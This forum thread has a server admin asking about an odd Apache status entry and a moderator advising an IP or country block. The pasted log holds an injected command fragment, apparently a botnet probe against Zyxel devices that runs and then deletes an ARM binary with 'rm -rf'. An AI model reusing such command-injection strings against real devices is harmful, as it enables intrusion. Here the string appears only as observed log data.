Strange status in Apache status

Benjade77

• March 26, 2021 10:45

Hi, I have a strange status in my Apache Status:

0-3

43083

0/60/557

_

21.47

402

0

292342

0.0

2.38

19.60

176.57.220.137

http/1.1

1-3

43396

0/149/321

_

34.58

402

1

232453

0.0

4.80

11.85

176.57.220.137

http/1.1

host.domain.tld:80

Akitaskid.arm7;rm+-rf+Akitaskid.arm7 Zyxel.arm7%3b%23&remoteSub

The IP seems to be based in Russia and as I know the Russians are very good at hacking (USA vote) so I am wondering. Can someone tell me more? Thank you very much.

• 

  cPRex Jurassic Moderator

  • March 26, 2021 18:28

  Hey there! With "rm -rf" present in the status, it looks like this IP address could be attempting malicious traffic. If this were my system I would likely block that IP address. If you know you should not be seeing any traffic from a certain country, you could use a country-code block in a tool like CSF to block the entire country at the firewall level.

  0
• 

  Benjade77

  • March 26, 2021 18:31

  This is what is weird because I blocked russia in cPhulk but it still seems to pass. It's dangerous or not ?

  0
• 

  cPRex Jurassic Moderator

  • March 26, 2021 18:36

  No country code range is ever perfect, so it's possible that didn't get identified as coming from the listed country. While the commands that person is trying would not run with that type of connection, that IP is clearly looking for vulnerabilities.

  0
• 

  Benjade77

  • March 26, 2021 18:38

  ok, I will block the ip ^^ Thank you

  0
• 

  cPRex Jurassic Moderator

  • March 26, 2021 18:50

  You're welcome!

  0

Please sign in to leave a comment.